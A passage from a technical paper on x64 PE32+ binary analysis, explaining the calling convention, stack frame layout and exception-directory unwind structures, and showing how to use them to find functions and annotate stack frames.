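#define PE_MAGIC_PE32_PLUS 0x020b  /* IMAGE_NT_OPTIONAL_HDR64_MAGIC */

/* Read little-endian values without making alignment assumptions. */
static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Hypothetical helper: returns the optional header Magic value of the PE
 * image held in buf, or 0 if the buffer does not look like a PE file.
 */
static uint16_t pe_optional_magic(const uint8_t *buf, size_t len)
{
    uint32_t e_lfanew;

    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return 0;
    e_lfanew = rd32(buf + 0x3c);      /* file offset of the "PE\0\0" signature */
    /* signature (4) + IMAGE_FILE_HEADER (20) + Magic (2) must fit */
    if (e_lfanew > len || len - e_lfanew < 26)
        return 0;
    if (memcmp(buf + e_lfanew, "PE\0\0", 4) != 0)
        return 0;
    return rd16(buf + e_lfanew + 24);
}
```

A return value of PE_MAGIC_PE32_PLUS indicates that the 64-bit variants of the structures described above should be used when parsing the rest of the image.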
|
||||
|
||||
With the exception of certain field offsets in specific structures,
|
||||
the PE32+ image file format is largely backward compatible with PE
|
||||
both in use and in form.
|
||||
|
||||
|
||||
3.2) Calling Convention
|
||||
|
||||
The calling convention used on x64 is much simpler than those used for
|
||||
x86. Unlike x86, where calling conventions like stdcall, cdecl, and
|
||||
fastcall are found, the x64 platform has only one calling convention.
|
||||
The calling convention that it uses is a derivative of fastcall where
|
||||
the first four parameters of a function are passed by register and any
|
||||
remaining parameters are passed through the stack. Each parameter is 64
|
||||
bits wide (8 bytes). The first four parameters are passed through the
|
||||
RCX, RDX, R8, and R9 registers, respectively. For scenarios where
|
||||
parameters are passed by value or are otherwise too large to fit into
|
||||
one of the 64-bit registers, appropriate steps are taken as documented
|
||||
in [4].
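
The register assignment can be summarized in a few lines of C. This is only a sketch for integer and pointer parameters (floating-point arguments travel in XMM0 through XMM3 in the same positions); the function name param_register is hypothetical.

```c
#include <stddef.h>

/*
 * Hypothetical helper: name of the register that carries integer or
 * pointer parameter number `index` (1-based), or NULL when that parameter
 * is passed on the stack instead.
 */
static const char *param_register(unsigned index)
{
    static const char *const regs[] = { "rcx", "rdx", "r8", "r9" };

    if (index >= 1 && index <= 4)
        return regs[index - 1];
    return NULL;
}
```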
|
||||
|
||||
|
||||
3.2.1) Stack Frame Layout
|
||||
|
||||
The stack frame layout for functions on x64 is very similar to x86, but
|
||||
with a few key differences. Just like x86, the stack frame on x64 is
|
||||
divided into three parts: parameters, return address, and locals. These
|
||||
three parts are explained individually below. One of the important
|
||||
principles to understand when it comes to x64 stack frames is that the
|
||||
stack does not fluctuate throughout the course of a given function. In
|
||||
fact, the stack pointer is only permitted to change in the context of a
|
||||
function prologue. Note that things like alloca are handled in a special
|
||||
manner[7]. Parameters are not pushed and popped from the stack. Instead,
|
||||
stack space is pre-allocated for all of the arguments that would be
|
||||
passed to child functions. This is done, in part, to make it easier
|
||||
to unwind call stacks in the event of an exception. The table below
|
||||
describes a typical stack frame:
|
||||
|
||||
|
||||
+-------------------------+
| Stack parameter area    |
+-------------------------+
| Register parameter area |
+-------------------------+
| Return address          |
+-------------------------+
| Locals                  |
+-------------------------+
|
||||
|
||||
|
||||
== Parameters
|
||||
|
||||
|
||||
The calling convention for functions on x64 dictates that the first four
|
||||
parameters are passed via register with any remaining parameters,
|
||||
starting with parameter five, spilling to the stack. Given that the
|
||||
fifth parameter is the first parameter passed by the stack, one would
|
||||
think that the fifth parameter would be the value immediately adjacent
|
||||
to the return address on the stack, but this is not the case. Instead,
|
||||
if a given function calls other functions, that function is required to
|
||||
allocate stack space for the parameters that are passed by register.
|
||||
This has the effect of making it such that the area of the stack
|
||||
immediately adjacent to the return address is 0x20 bytes of
|
||||
uninitialized storage for the parameters passed by register followed
|
||||
immediately by any parameters that spill to the stack (starting with
|
||||
parameter five). The area of storage allocated on the stack for the
|
||||
register parameters is known as the register parameter area whereas the
|
||||
area of the stack for parameters that spill onto the stack is known as
|
||||
the stack parameter area. The table below illustrates what the
|
||||
parameter portion of a stack frame would look like after making a call
|
||||
to a function:
|
||||
|
||||
+-------------------------+
| Parameter 6             |
+-------------------------+
| Parameter 5             |
+-------------------------+
| Parameter 4 (R9 Home)   |
+-------------------------+
| Parameter 3 (R8 Home)   |
+-------------------------+
| Parameter 2 (RDX Home)  |
+-------------------------+
| Parameter 1 (RCX Home)  |
+-------------------------+
| Return address          |
+-------------------------+
|
||||
|
||||
|
||||
To emphasize further, the register parameter area is always allocated,
|
||||
even if the function being called has fewer than four arguments. This
|
||||
area of the stack is effectively owned by the called function, and as
|
||||
such can be used for volatile storage during the course of the function
|
||||
call. In particular, this area is commonly used to persist the values
|
||||
of register parameters. This area is also referred to as the ``home''
|
||||
address for register parameters. However, it can also be used to save
|
||||
non-volatile registers. To someone familiar with x86 it may seem
|
||||
slightly odd to see functions modifying areas of the stack beyond the
|
||||
return address. The key is to remember that the 0x20 bytes immediately
|
||||
adjacent to the return address are owned by the called function. One
|
||||
important side effect of this requirement is that if a function calls
|
||||
other functions, the calling function's minimum stack allocation will be
|
||||
0x20 bytes. This accounts for the register parameter area that will be
|
||||
used by called functions.
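
The layout described above reduces to simple arithmetic. The sketch below computes where a parameter lives relative to RSP at function entry and the smallest outgoing-argument area a caller must reserve. The names are invented for this example, and the 16-byte stack alignment that real compilers also maintain is deliberately ignored.

```c
#include <stdint.h>

#define PARAM_SLOT_SIZE      8u     /* every parameter occupies one 64-bit slot */
#define REGISTER_PARAM_AREA  0x20u  /* four home slots: RCX, RDX, R8, R9 */

/*
 * Offset of parameter `index` (1-based) from RSP at the moment the called
 * function is entered, i.e. while [rsp] still holds the return address.
 */
static uint32_t param_offset_at_entry(unsigned index)
{
    return PARAM_SLOT_SIZE * index;
}

/*
 * Smallest outgoing-argument area a caller must reserve for a call that
 * passes `nparams` parameters. It is never smaller than the register
 * parameter area, even for calls that take no parameters at all.
 */
static uint32_t outgoing_area_size(unsigned nparams)
{
    uint32_t size = PARAM_SLOT_SIZE * nparams;

    return size < REGISTER_PARAM_AREA ? REGISTER_PARAM_AREA : size;
}
```

With these definitions, the RCX home slot sits at [rsp+8] on entry and the fifth parameter at [rsp+0x28], directly above the four home slots.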
|
||||
|
||||
The obvious question to ask at this point is why it's the caller's
|
||||
responsibility to allocate stack space for use by the called function.
|
||||
There are a few different reasons for this. Perhaps most importantly,
|
||||
it makes it possible for the called function to take the address of a
|
||||
parameter that's passed via a register. Furthermore, the address that
|
||||
is returned for the parameter must be at a location that is contiguous
|
||||
in relation to the other parameters. This is particularly necessary for
|
||||
variadic functions, which require a contiguous list of parameters, but
|
||||
may also be necessary for applications that make assumptions about being
|
||||
able to reference parameters in relation to one another by address.
|
||||
Invalidating this assumption would introduce source compatibility
|
||||
problems.
|
||||
|
||||
For more information on parameter passing, refer to the MSDN
|
||||
documentation[4,7].
|
||||
|
||||
== Return Address
|
||||
|
||||
Due to the fact that pointers are 64 bits wide on x64, the return
|
||||
address location on the stack is eight bytes instead of four.
|
||||
|
||||
== Locals
|
||||
|
||||
The locals portion of a function's stack frame encompasses both local
|
||||
variables and saved non-volatile registers. For x64, the general
|
||||
purpose registers described as non-volatile are RBP, RBX, RDI, RSI, and
|
||||
R12 through R15[5].
|
||||
|
||||
|
||||
3.3) Exception Handling on x64
|
||||
|
||||
On x86, exception handling is accomplished through the adding and
|
||||
removing of exception registration records on a per-thread basis. When
|
||||
a function is entered that makes use of an exception handler, it
|
||||
constructs an exception registration record on the stack that is
|
||||
composed of an exception handler (a function pointer), and a pointer to
|
||||
the next element in the exception handler list. This list of exception
|
||||
registration records is stored relative to fs:[0]. When an exception
|
||||
occurs, the exception dispatcher walks the list of exception handlers
|
||||
and calls each one, checking to see if they are capable of handling the
|
||||
exception that occurred. While this approach works perfectly fine,
|
||||
Microsoft realized that there were better ways to go about it. First of
|
||||
all, the adding and removing of exception registration records that are
|
||||
static in the context of an execution path adds needless execution
|
||||
overhead. Secondly, the security implications of storing a function
|
||||
pointer on the stack have been made very obvious, especially in the case
|
||||
where that function pointer can be called after an exception is
|
||||
generated (such as an access violation). Finally, the process of
|
||||
unwinding call frames is muddled with limitations, thus making it a more
|
||||
complicated process than it might otherwise need to be[6].
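
To make the x86 scheme concrete, the following sketch models the registration list and the dispatcher's walk over it in portable C. It is a simplification under stated assumptions: the real handler takes an exception record, frame pointer, context, and dispatcher context rather than a bare exception code, and the structure and function names here are invented for the example.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for the x86 exception registration record. */
struct reg_record {
    struct reg_record *next;                  /* next (outer) record        */
    int (*handler)(uint32_t exception_code);  /* nonzero means "handled"    */
};

/* The real list is terminated by a pointer value of -1 rather than NULL. */
#define CHAIN_END ((struct reg_record *)(uintptr_t)-1)

/* Two sample handlers used only to exercise the walk. */
static int accepts_access_violation(uint32_t code)
{
    return code == 0xC0000005u;
}

static int declines_everything(uint32_t code)
{
    (void)code;
    return 0;
}

/*
 * Walk the list from the innermost record outward, the way the dispatcher
 * does starting from fs:[0]. Returns the record whose handler accepted the
 * exception, or NULL if no handler did.
 */
static struct reg_record *dispatch(struct reg_record *head, uint32_t code)
{
    struct reg_record *r;

    for (r = head; r != CHAIN_END; r = r->next)
        if (r->handler(code))
            return r;
    return NULL;
}
```

Because each record lives on the stack next to ordinary locals, a stack overflow that reaches a record controls the function pointer the dispatcher will call, which is the security problem noted above.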
|
||||
|
||||
With these things in mind, Microsoft completely revamped the way
|
||||
exception handling is accomplished on x64. The major changes center
|
||||
around the approaches Microsoft has taken to solve the three major
|
||||
deficiencies found on x86. First, Microsoft solved the execution time
|
||||
overhead issue of adding and removing exception handlers by moving all
|
||||
of the static exception handling information into a static location in
|
||||
the binary. This location, known as the .pdata section, is described by
|
||||
the PE32+'s Exception Directory. The structure of this section will be
|
||||
described in the exception directory subsection. By eliminating the
|
||||
need to add and remove exception handlers on the fly, Microsoft has also
|
||||
eliminated the security issue found on x86 with regard to overwriting
|
||||
the function pointer of an exception handler. Perhaps most importantly,
|
||||
the process involved in unwinding call frames has been drastically
|
||||
improved through the formalization of the frame unwinding process. This
|
||||
will be discussed in the subsection on unwind information.
|
||||
|
||||
|
||||
3.3.1) Exception Directory
|
||||
|
||||
The Exception Directory of a PE32+ binary is used to convey the complete
|
||||
list of functions that could be found in a stack frame during an unwind
|
||||
operation. These functions are known as non-leaf functions, and they
|
||||
are qualified as such if they either allocate space on the stack or call
|
||||
other functions. The IMAGE_RUNTIME_FUNCTION_ENTRY data structure is used
|
||||
to describe the non-leaf functions, as shown below[1]:
|
||||
|
||||
typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY {
    ULONG BeginAddress;
    ULONG EndAddress;
    ULONG UnwindInfoAddress;
} _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY;
|
||||
|
||||
The BeginAddress and EndAddress attributes are RVAs that represent the
|
||||
range of the non-leaf function. The UnwindInfoAddress will be discussed
|
||||
in more detail in the following subsection on unwind information. The
|
||||
Exception directory itself is merely an array of
|
||||
IMAGE_RUNTIME_FUNCTION_ENTRY structures. When an exception occurs, the
|
||||
exception dispatcher will enumerate the array of runtime function
|
||||
entries until it finds the non-leaf function associated with the address
|
||||
it's searching for (typically a return address).
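
The lookup itself can be sketched as follows. This is an illustration rather than the dispatcher's actual code: it uses a linear scan to match the description above and assumes that EndAddress is exclusive. The structure and function names are chosen for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirrors IMAGE_RUNTIME_FUNCTION_ENTRY; all three fields are RVAs. */
struct runtime_function {
    uint32_t begin_address;
    uint32_t end_address;
    uint32_t unwind_info_address;
};

/*
 * Return the entry whose [begin_address, end_address) range contains rva,
 * or NULL if there is none, in which case the address is treated as
 * belonging to a leaf function.
 */
static const struct runtime_function *
lookup_function_entry(const struct runtime_function *table, size_t count,
                      uint32_t rva)
{
    size_t i;

    for (i = 0; i < count; i++)
        if (rva >= table[i].begin_address && rva < table[i].end_address)
            return &table[i];
    return NULL;
}
```

If the entries are sorted by BeginAddress, the scan can be replaced with a binary search without changing the interface.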
|
||||
|
||||
|
||||
3.3.2) Unwind Information
|
||||
|
||||
For the purpose of unwinding call frames and dispatching exceptions,
|
||||
each non-leaf function has some non-zero amount of unwind information
|
||||
associated with it. This association is made through the
|
||||
UnwindInfoAddress attribute of the IMAGE_RUNTIME_FUNCTION_ENTRY
|
||||
structure. The UnwindInfoAddress itself is an RVA that points to an
|
||||
UNWIND_INFO structure which is defined as[8]:
|
||||
|
||||
typedef struct _UNWIND_INFO {
    UBYTE Version       : 3;
    UBYTE Flags         : 5;
    UBYTE SizeOfProlog;
    UBYTE CountOfCodes;
    UBYTE FrameRegister : 4;
    UBYTE FrameOffset   : 4;
    UNWIND_CODE UnwindCode[1];
/*  UNWIND_CODE MoreUnwindCode[((CountOfCodes + 1) & ~1) - 1];
 *  union {
 *      OPTIONAL ULONG ExceptionHandler;
 *      OPTIONAL ULONG FunctionEntry;
 *  };
 *  OPTIONAL ULONG ExceptionData[]; */
} UNWIND_INFO, *PUNWIND_INFO;
|
||||
|
||||
This structure, at a very high level, describes a non-leaf function in
|
||||
terms of its prologue size and frame register usage. Furthermore, it
|
||||
describes the way in which the stack is set up when the prologue for
|
||||
this non-leaf function is executed. This is provided through an array
|
||||
of codes as accessed through the UnwindCode array. This array is
|
||||
composed of UNWIND_CODE structures which are defined as[8]:
|
||||
|
||||
typedef union _UNWIND_CODE {
    struct {
        UBYTE CodeOffset;
        UBYTE UnwindOp : 4;
        UBYTE OpInfo   : 4;
    };
    USHORT FrameOffset;
} UNWIND_CODE, *PUNWIND_CODE;
|
||||
|
||||
In order to properly unwind a frame, the exception dispatcher needs to
|
||||
be aware of the amount of stack space allocated in that frame, the
|
||||
locations of saved non-volatile registers, and anything else that has to
|
||||
do with the stack. This information is necessary in order to be able to
|
||||
restore the caller's stack frame when an unwind operation occurs. By
|
||||
having the compiler keep track of this information at link time, it's
|
||||
possible to emulate the unwind process by inverting the operations
|
||||
described in the unwind code array for a given non-leaf function.
|
||||
|
||||
Aside from conveying stack frame set up, the UNWIND_INFO structure may
|
||||
also describe exception handling information, such as the exception
|
||||
handler that is to be called if an exception occurs. This information
|
||||
is conveyed through the ExceptionHandler and ExceptionData attributes of
|
||||
the structure which exist only if the UNW_FLAG_EHANDLER or UNW_FLAG_UHANDLER flag is set in the
|
||||
Flags field.
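
Since the optional fields follow a variable-length array, locating them takes a small calculation. The sketch below decodes the first byte of an UNWIND_INFO structure and computes the offset of the data that follows the unwind codes. It assumes the usual bit-field layout in which Version occupies the low three bits; the function names are made up for this example.

```c
#include <stdint.h>

#define UNW_FLAG_EHANDLER  0x1
#define UNW_FLAG_UHANDLER  0x2
#define UNW_FLAG_CHAININFO 0x4

/* The first byte packs Version in the low 3 bits and Flags in the high 5. */
static unsigned unwind_version(uint8_t first_byte)
{
    return first_byte & 0x7;
}

static unsigned unwind_flags(uint8_t first_byte)
{
    return first_byte >> 3;
}

/* Nonzero if the ExceptionHandler and ExceptionData fields are present. */
static int unwind_has_handler(uint8_t first_byte)
{
    unsigned mask = UNW_FLAG_EHANDLER | UNW_FLAG_UHANDLER;

    return (unwind_flags(first_byte) & mask) != 0;
}

/*
 * Byte offset, from the start of UNWIND_INFO, of the data that follows the
 * unwind code array. The fixed header is 4 bytes and the array is padded
 * to an even number of 2-byte slots.
 */
static uint32_t unwind_trailer_offset(uint8_t count_of_codes)
{
    uint32_t slots = ((uint32_t)count_of_codes + 1) & ~1u;

    return 4 + 2 * slots;
}
```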
|
||||
|
||||
For more details on the format and use of these structures for unwinding
|
||||
as well as a complete description of the unwind process, please refer to
|
||||
the MSDN documentation[2].
|
||||
|
||||
|
||||
4) Analysis Techniques
|
||||
|
||||
In order to improve the analysis of x64 binaries, it is important to try
|
||||
to identify techniques that can aid in the identification or extraction
|
||||
of useful information from the binary in an automated fashion. This
|
||||
chapter will focus on a handful of simple techniques that can be used to
|
||||
better annotate or describe the behavior of an x64 binary. These
|
||||
techniques intentionally do not cover the analysis of code or data flow
|
||||
operations. Such techniques are outside of the scope of this paper.
|
||||
|
||||
|
||||
4.1) Exception Directory Enumeration
|
||||
|
||||
Given the explanation of the Exception Directory found within PE32+
|
||||
images and its application to the exception dispatching process, it can
|
||||
be seen that x64 binaries have a lot of useful meta-information stored
|
||||
within them. Given that this information is just sitting there waiting
|
||||
to be used, it makes sense to try to take advantage of it in ways that
|
||||
make it possible to better annotate or understand an x64 binary. The
|
||||
following subsections will describe different things that can be
|
||||
discovered by digging deeper into the contents of the exception
|
||||
directory.
|
||||
|
||||
|
||||
4.1.1) Functions
|
||||
|
||||
One of the most obvious uses for the information stored in the exception
|
||||
directory is that it can be used to discover all of the non-leaf
|
||||
functions in a binary. This is cool because it works regardless of
|
||||
whether or not you actually have symbols for the binary, thus providing
|
||||
an easy technique for identifying the majority of the functions in a
|
||||
binary. The process taken to do this is to simply enumerate the array
|
||||
of IMAGE_RUNTIME_FUNCTION_ENTRY structures stored within the exception
|
||||
directory. The BeginAddress attribute of each entry marks the starting
|
||||
point of a non-leaf function. There's a catch, though. Not all of the
|
||||
runtime function entries are actually associated with the entry point of
|
||||
a function. The fact of the matter is that entries can also be
|
||||
associated with various portions of an actual function where stack
|
||||
modifications are deferred until necessary. In these cases, the unwind
|
||||
information associated with the runtime function entry is chained with
|
||||
another runtime function entry.
|
||||
|
||||
The chaining of runtime function entries is documented as being
|
||||
indicated through the UNW_FLAG_CHAININFO flag in the Flags attribute of
|
||||
the UNWIND_INFO structure. If this flag is set, the area of memory
|
||||
immediately following the last UNWIND_CODE in the UNWIND_INFO structure
|
||||
is an IMAGE_RUNTIME_FUNCTION_ENTRY structure. The UnwindInfoAddress of
|
||||
this structure indicates the chained unwind information. Aside from
|
||||
this, chaining can also be indicated through an undocumented flag that
|
||||
is stored in the least-significant bit of the UnwindInfoAddress. If the
|
||||
least-significant bit is set, then it is implied that the runtime
|
||||
function entry is directly chained to the IMAGE_RUNTIME_FUNCTION_ENTRY
|
||||
structure that is found at the RVA conveyed by the UnwindInfoAddress
|
||||
attribute with the least significant bit masked off. The reason
|
||||
chaining can be indicated in this fashion is because it is a requirement
|
||||
that unwind information be four-byte aligned.
|
||||
|
||||
With chaining in mind, it is safe to assume that a runtime function
|
||||
entry is associated with the entry point of a function if its unwind
|
||||
information is not chained. This makes it possible to deterministically
|
||||
identify the entry point of all of the non-leaf functions. From there,
|
||||
it should be possible to identify all of the leaf functions through
|
||||
calls that are made to them by non-leaf functions. This requires code
|
||||
flow analysis, though.
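
The chaining test described above can be sketched in a few lines. The function names are hypothetical, and the caller is assumed to have already read the first byte of the UNWIND_INFO structure that the entry refers to.

```c
#include <stdint.h>

#define UNW_FLAG_CHAININFO 0x4

/*
 * Decide whether a runtime function entry marks a function entry point.
 * unwind_info_rva is the entry's UnwindInfoAddress; first_byte is the first
 * byte of the UNWIND_INFO it points to. first_byte is ignored when the low
 * bit of the RVA is set, because the RVA then refers to another runtime
 * function entry rather than to unwind information.
 */
static int entry_is_function_start(uint32_t unwind_info_rva, uint8_t first_byte)
{
    if (unwind_info_rva & 1)                     /* undocumented direct chain */
        return 0;
    if ((first_byte >> 3) & UNW_FLAG_CHAININFO)  /* documented chain flag     */
        return 0;
    return 1;
}

/* RVA of the chained-to entry when the low bit of UnwindInfoAddress is set. */
static uint32_t chained_entry_rva(uint32_t unwind_info_rva)
{
    return unwind_info_rva & ~1u;
}
```

Collecting the BeginAddress of every entry for which entry_is_function_start returns nonzero yields the list of non-leaf function entry points.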
|
||||
|
||||
|
||||
4.1.2) Stack Frame Annotation
|
||||
|
||||
The unwind information associated with each non-leaf function
|
||||
contains lots of useful meta-information about the structure of the
|
||||
stack. It provides information about the amount of stack space
|
||||
allocated, the location of saved non-volatile registers, and whether or
|
||||
not a frame register is used and what relation it has to the rest of the
|
||||
stack. This information is also described in terms of the location of
|
||||
the instruction that actually performs the operation associated with the
|
||||
task. Take the following unwind information obtained through dumpbin
|
||||
/unwindinfo as an example:
|
||||
|
||||
|
||||
0000060C 00006E50 00006FF0 000081FC  _resetstkoflw
  Unwind version: 1
  Unwind flags: None
  Size of prologue: 0x47
  Count of codes: 18
  Frame register: rbp
  Frame offset: 0x20
  Unwind codes:
    3C: SAVE_NONVOL, register=r15 offset=0x98
    38: SAVE_NONVOL, register=r14 offset=0xA0
    31: SAVE_NONVOL, register=r13 offset=0xA8
    2A: SAVE_NONVOL, register=r12 offset=0xD8
    23: SAVE_NONVOL, register=rdi offset=0xD0
    1C: SAVE_NONVOL, register=rsi offset=0xC8
    15: SAVE_NONVOL, register=rbx offset=0xC0
    0E: SET_FPREG, register=rbp, offset=0x20
    09: ALLOC_LARGE, size=0xB0
    02: PUSH_NONVOL, register=rbp
|
||||
|
||||
|
||||
First and foremost, one can immediately see that the size of the
|
||||
prologue used in the resetstkoflw function is 0x47 bytes. This prologue
|
||||
accounts for all of the operations described in the unwind codes array.
|
||||
Furthermore, one can also tell that the function uses a frame pointer,
|
||||
as conveyed through rbp, and that the frame pointer offset is 0x20 bytes
|
||||
relative to the current stack pointer at the time the frame pointer
|
||||
register is established.
|
||||
|
||||
As one would expect with an unwind operation, the unwind codes
|
||||
themselves are stored in the reverse of the order in which they execute.
|
||||
This is necessary because of the effect on the stack each unwind code
|
||||
can have. If they are processed in the wrong order, then the unwind
|
||||
operation will get invalid data. For example, the value obtained
|
||||
through a pop rbp instruction will differ depending on whether or not it
|
||||
is done before or after an add rsp, 0xb0.
|
||||
|
||||
For the purposes of annotation, however, the important thing to keep in
|
||||
mind is how all of the useful information can be extracted. In this
|
||||
case, it is possible to take all of the information the unwind codes
|
||||
provide and break it down into a definition of the stack frame layout
|
||||
for a function. This can be accomplished by processing the unwind codes
|
||||
in the order that they would be executed rather than the order that they
|
||||
appear in the array. There's one important thing to keep in mind when
|
||||
doing this. Since unwind information can be chained, it is a
|
||||
requirement that the full chain of unwind codes be processed in
|
||||
execution order. This can be accomplished by walking the chain of
|
||||
unwind information and building an execution order list of all of the
|
||||
unwind codes.
|
||||
|
||||
Once the execution order list of unwind codes is collected, the next
|
||||
step is to simply enumerate each code, checking to see what operation it
|
||||
performs and building out the stack frame across each iteration. Prior
|
||||
to enumerating each code, the state of the stack pointer should be
|
||||
initialized to 0 to indicate an empty stack frame. As data is allocated
|
||||
on the stack, the stack pointer should be adjusted by the appropriate
|
||||
amount. The actions that need to be taken for each unwind operation
|
||||
that directly affect the stack pointer are described below.
|
||||
|
||||
1. UWOP_PUSH_NONVOL
|
||||
|
||||
When a non-volatile register is pushed onto the stack, such as
|
||||
through a push rbp, the current stack pointer needs to be
|
||||
decremented by 8 bytes.
|
||||
|
||||
2. UWOP_ALLOC_LARGE and UWOP_ALLOC_SMALL
|
||||
|
||||
When stack space is allocated, the current stack pointer needs to
|
||||
be adjusted by the amount indicated.
|
||||
|
||||
3. UWOP_SET_FPREG
|
||||
|
||||
When a frame pointer is defined, its offset relative to the base of
|
||||
the stack should be saved using the current value of the stack
|
||||
pointer.
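
The three rules above can be sketched as a small routine. To keep the example short it works on unwind codes that have already been decoded into an operation and a value, so the enum, structures, and function name below are inventions of this sketch rather than the on-disk format. Stack growth is tracked as a positive depth below the return address.

```c
#include <stddef.h>
#include <stdint.h>

/* Already-decoded unwind operations; names chosen for this sketch. */
enum uw_op { UW_PUSH_NONVOL, UW_ALLOC, UW_SET_FPREG, UW_SAVE_NONVOL };

struct uw_code {
    enum uw_op op;
    uint32_t   value;  /* UW_ALLOC: size; UW_SET_FPREG, UW_SAVE_NONVOL: offset */
};

struct frame_summary {
    uint32_t depth;           /* bytes below the return address after prologue */
    int      has_frame_reg;   /* nonzero if a frame register is established    */
    uint32_t depth_at_fpreg;  /* depth when the frame register was set         */
    uint32_t fpreg_offset;    /* frame register = RSP + this offset            */
};

static struct frame_summary
summarize_frame(const struct uw_code *codes, size_t count)
{
    struct frame_summary s = { 0, 0, 0, 0 };
    size_t i;

    /* The array is stored last-executed first, so walk it backwards. */
    for (i = count; i-- > 0; ) {
        switch (codes[i].op) {
        case UW_PUSH_NONVOL:
            s.depth += 8;
            break;
        case UW_ALLOC:
            s.depth += codes[i].value;
            break;
        case UW_SET_FPREG:
            s.has_frame_reg = 1;
            s.depth_at_fpreg = s.depth;
            s.fpreg_offset = codes[i].value;
            break;
        case UW_SAVE_NONVOL:
            /* Stores a register at a fixed offset; RSP does not move. */
            break;
        }
    }
    return s;
}
```

Fed the codes from the example unwind information, this reports a frame depth of 0xB8 bytes (8 for the pushed rbp plus the 0xB0 allocation) and a frame register set at rsp+0x20.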
|
||||
|
||||
|
||||
As the enumeration of unwind codes occurs, it is also possible to annotate
|
||||
the different locations on the stack where non-volatile registers are
|
||||
preserved. For instance, given the example unwind information above, it
|
||||
is known that the R15 register is preserved at [rsp + 0x98]. Therefore,
|
||||
we can annotate this location as [rsp + SavedR15].
|
||||
|
||||
Beyond annotating preserved register locations on the stack, we can also
|
||||
annotate the instructions that perform operations that affect the stack.
|
||||
For instance, when a non-volatile register is pushed, such as through
|
||||
push rbp, we can annotate the instruction that performs that operation
|
||||
as preserving rbp on the stack. The location of the instruction that's
|
||||
associated with the operation can be determined by taking the
|
||||
BeginAddress associated with the unwind information and adding it to the
|
||||
CodeOffset attribute of the UNWIND_CODE that is being processed. It is
|
||||
important to note, however, that the CodeOffset attribute actually
|
||||
points to the first byte of the instruction immediately following the
|
||||
one that performs the actual operation, so it is necessary to back track
|
||||
in order to determine the start of the instruction that actually
|
||||
performs the operation.
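
Both address calculations used for annotation are simple enough to show directly. The sketch below uses invented function names. Finding the start of the instruction that precedes the computed address still requires a disassembler and is not shown.

```c
#include <stdint.h>

/* RVA of the instruction that follows the one an unwind code describes. */
static uint32_t next_instruction_rva(uint32_t begin_address, uint8_t code_offset)
{
    return begin_address + code_offset;
}

/*
 * Convert the RSP-relative offset from a SAVE_NONVOL code into the
 * displacement seen in the disassembly when the slot is addressed through
 * the frame register, where frame register = RSP + frame_offset.
 */
static int32_t frame_reg_displacement(uint32_t rsp_offset, uint32_t frame_offset)
{
    return (int32_t)rsp_offset - (int32_t)frame_offset;
}
```

For the example function, the PUSH_NONVOL code at offset 0x02 yields RVA 0x6E52, the instruction right after the push rbp at 0x6E50, and the R15 slot at [rsp + 0x98] corresponds to a displacement of 0x78 from rbp.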
|
||||
|
||||
As a result of this analysis, one can take the prologue of the
|
||||
resetstkoflw function and automatically convert it from:
|
||||
|
||||
.text:100006E50    push    rbp
.text:100006E52    sub     rsp, 0B0h
.text:100006E59    lea     rbp, [rsp+0B0h+var_90]
.text:100006E5E    mov     [rbp+0A0h], rbx
.text:100006E65    mov     [rbp+0A8h], rsi
.text:100006E6C    mov     [rbp+0B0h], rdi
.text:100006E73    mov     [rbp+0B8h], r12
.text:100006E7A    mov     [rbp+88h], r13
.text:100006E81    mov     [rbp+80h], r14
.text:100006E88    mov     [rbp+78h], r15
|
||||
|
||||
|
||||
to a version with better annotation:
|
||||
|
||||
|
||||
.text:100006E50    push    rbp                          ; SavedRBP
.text:100006E52    sub     rsp, 0B0h
.text:100006E59    lea     rbp, [rsp+20h]
.text:100006E5E    mov     [rbp+0A0h], rbx              ; SavedRBX
.text:100006E65    mov     [rbp+98h+SavedRSI], rsi      ; SavedRSI
.text:100006E6C    mov     [rbp+98h+SavedRDI], rdi      ; SavedRDI
.text:100006E73    mov     [rbp+98h+SavedR12], r12      ; SavedR12
.text:100006E7A    mov     [rbp+98h+SavedR13], r13      ; SavedR13
.text:100006E81    mov     [rbp+98h+SavedR14], r14      ; SavedR14
.text:100006E88    mov     [rbp+98h+SavedR15], r15      ; SavedR15
|
||||
|
||||
|
||||
While such annotation may not be entirely useful to understanding
|
||||
the behavior of the binary, it at least simplifies the process of
|
||||
understanding the layout of the stack.
|
||||
|
||||
|
||||
4.1.3) Exception Handlers
|
||||
|
||||
The unwind information structure for a non-leaf function also contains
|
||||
useful information about the way in which exceptions within that
|
||||
function should be dispatched. If the unwind information associated
|
||||
with a function has the UNW_FLAG_EHANDLER or UNW_FLAG_UHANDLER flag set,
|
||||
then the function has an exception handler associated with it. The
|
||||
exception handler is conveyed through the ExceptionHandler attribute
|
||||
which comes immediately after the array of unwind codes. This handler is
|
||||
defined as being a language-specific handler for processing the
|
||||
exception. More specifically, the exception handler is specific to the
|
||||
semantics associated with a given programming language, such as C or
|
||||
C++[3]. For C, the language-specific exception handler is named
|
||||
__C_specific_handler.
|
||||
|
||||
Given that all C functions that handle exceptions will have the same
|
||||
exception handler, how does the function-specific code for handling an
|
||||
exception actually get called? For the case of C functions, the
|
||||
function-specific exception handler is stored in a scope table in the
|
||||
ExceptionData portion of the UNWIND_INFO structure. Other languages may
|
||||
have a different ExceptionData definition. This C scope table is defined
|
||||
by the structures shown below:
|
||||
|
||||
typedef struct _C_SCOPE_TABLE_ENTRY {
    ULONG Begin;
    ULONG End;
    ULONG Handler;
    ULONG Target;
} C_SCOPE_TABLE_ENTRY, *PC_SCOPE_TABLE_ENTRY;

typedef struct _C_SCOPE_TABLE {
    ULONG NumEntries;
    C_SCOPE_TABLE_ENTRY Table[1];
} C_SCOPE_TABLE, *PC_SCOPE_TABLE;
|
||||
|
||||
The scope table entries describe the function-specific exception
|
||||
handlers in relation to the specific areas of the function that they
|
||||
apply to. Each of the attributes of the C_SCOPE_TABLE_ENTRY is expressed
|
||||
as an RVA. The Target attribute defines the location to transfer
|
||||
control to after the exception is handled.
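
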